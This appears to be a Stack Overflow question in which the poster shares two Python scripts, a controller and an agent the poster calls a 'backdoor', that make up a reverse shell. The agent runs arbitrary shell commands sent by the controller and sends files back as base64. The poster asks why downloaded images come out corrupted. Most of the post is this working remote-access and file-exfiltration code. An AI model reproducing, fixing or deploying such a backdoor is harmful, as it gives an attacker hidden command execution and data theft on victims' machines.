# I write two reverse shell python script. One serves as agent or backdoor. Another serves as controller

Tags: python-3.x

Controller:

```
def reliable_send(self,client_socket,data):
        client_socket.send(json.dumps(data).encode('utf-8'))
    
    def reliable_recv(self,client_socket):
        data = ""
        
        while True:
            try:
                recv_data = client_socket.recv(1024)               
                data = data + recv_data.decode('utf-8')
                return json.loads(data)

            except ValueError:
                continue
    
    def download_file(self, client_socket,file_path):
       
        recv_data = self.reliable_recv(client_socket)
        print(recv_data)
        print('='*1000)
        write_data = base64.b64decode(recv_data)
        print(write_data)
      
        f = open(file_path, 'wb')
        f.write(write_data)
        f.close()
       
        print('Downloaded successfully')



    def client_handler(self, client_socket, client_address):
        print("[+] Connected from :%s" % str(client_address))
        while True:
            command = input("~ ")
            if command == 'q':
                break
            if command == '':
                continue
            if command.startswith('cd'):
                self.reliable_send(client_socket,command)
                recv_data = self.reliable_recv(client_socket)
                print(recv_data)
                continue
            if command.startswith('download'):
                print('Begin to download file...')
                self.reliable_send(client_socket,command)
                file_path = command.split()[1]
                self.download_file(client_socket, file_path)
                continue

            # client_socket.send(command.encode('utf-8'))
            self.reliable_send(client_socket,command)
            # recv_data = client_socket.recv(1024)
            recv_data = self.reliable_recv(client_socket)
            # print(recv_data.decode('utf-8'))
            print(recv_data)
        
        client_socket.close()
```

Agent side:

```
def reliable_send(self,data):
        self.client_socket.send(json.dumps(data).encode('utf-8'))
    
    def reliable_recv(self):
        data = ""
        while True:
            try:
                recv_data = self.client_socket.recv(1024)
                data = data + recv_data.decode('utf-8')
                return json.loads(data)

            except ValueError:
                continue
    
    def download_file(self,file_path):            
       
        with open(file_path, 'rb') as f:
            send_data = str(base64.b64encode(f.read()))
            self.reliable_send(send_data)

    def run(self):
        while True:
            # command = self.client_socket.recv(1024).decode('utf-8')
            command = self.reliable_recv()
            res = ""
            print(command)
            if command == 'q':
                break
            if command == '':
                continue
            if command.startswith('cd'):
                cd_path = command.split()[1]
                if not os.path.exists(cd_path):
                    res = 'No such directory to navigate'
                    self.reliable_send(res)
                     
                    continue
                
                else:
                    os.chdir(cd_path)
                    res = 'Changed successfully'
                    self.reliable_send(res)
                    continue    
            if command.startswith('download'):
                print("Begin to download")
                file_path = command.split()[1]
                self.download_file(file_path)
                continue
            try:
                result = subprocess.run(command, shell=True, capture_output=True)
                if len(result.stderr) == 0:
                    res = result.stdout.decode('utf-8')
                else:
                    res = result.stderr.decode('utf-8')
                
            except Exception as e:
                res = 'Failed to execute command'
                print('Failed to execute: %s' % e)
                
            
            print(res)
        
          
            self.reliable_send(res)
        self.client_socket.close()
```

When I try to download files from the agent by running controller, I failed to open the file such as image.
However, I debug the code by running codes in the python terminal , I can decode the transfered data and write into the file without problem.
I have no idea how to fix the issue.

I tried many times. But don't what is the cause for the problem.

Comment: Welcome to Stack Overflow! It would greatly help us to understand your question if you add more details describing how your program fails. Are there any error messages or just the file is missing on the receiving end?